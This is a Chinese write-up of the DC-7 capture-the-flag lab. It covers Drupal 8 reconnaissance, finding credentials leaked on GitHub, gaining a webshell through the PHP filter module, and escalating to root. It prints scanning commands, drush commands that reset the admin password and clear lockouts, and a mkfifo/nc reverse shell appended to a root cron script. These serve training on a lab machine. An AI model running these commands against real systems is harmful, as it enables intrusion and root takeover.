nmap扫描

访问80端口

首页英文翻译过来就是：

DC-7引入了一些“新”概念，但我将让您弄清楚它们是什么。:-)

虽然这个挑战并不完全是技术性的，但如果你需要诉诸暴力或字典攻击，你可能不会成功。

你要做的，就是在盒子外思考。

在盒子外面。:-)

盒子外？这里我没有理解作者的意思，还是常规思路去走流程

目录扫描

python3 dirsearch.py -u http://192.168.1.5/ -e php -w db/Zdir.txt

发现了web.config，robots.txt等一些文件，但没有可利用的东西

sqlmap跑search

sqlmap -u “http://192.168.1.5/search/node?keys=1” --dbs

使用Drupal的扫描工具---droope

吐槽：扫的很慢，。只能确定大致版本

去exploit database查找Drupal的历史漏洞

试了很多，都没成功

遗漏的地方：盒子外面。什么是盒子外面？

看过其他大佬题解后，原来突破点在@DC7USER这

google搜索@DC7USER

一个Teitter账号，一个github账号

在github里的配置文件中找到了用户密码

ssh登陆dc7user账号

基本的信息搜集

dc7user目录下mbox中发现一个定时启动脚本

分析backups.sh

backups.sh以root权限定期执行，但www-data组也有所有权限，因此从网站入手拿到www-data权限写入nc定期执行，然后连接就是root权限了

drush命令

drush，gpg简单来说就是专门用来管理Drupal站点的shell。这里用drush命令更改admin密码，解除五次登陆错误后的锁定

drush：https://www.liumwei.org/blog/drushCommand
drush user-password admin --password="000"
drush php-eval ‘db_query("DELETE FROM `flood`");‘

Drupal后台getshell

Drupal通常getshell通过php filter，但Drupal8移除了这个模块，我们可以下载手动安装

https://www.drupal.org/project/php

导入界面

http://192.168.1.5/admin/modules

启用php filter模块,添加basic page

 蚁剑连接

上传msfvenom的php马，获得session

向backups.sh中添加反弹nc

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.6 1234 >/tmp/f" >> backups.sh

DC-7

原文：https://www.cnblogs.com/wxy-make/p/12596072.html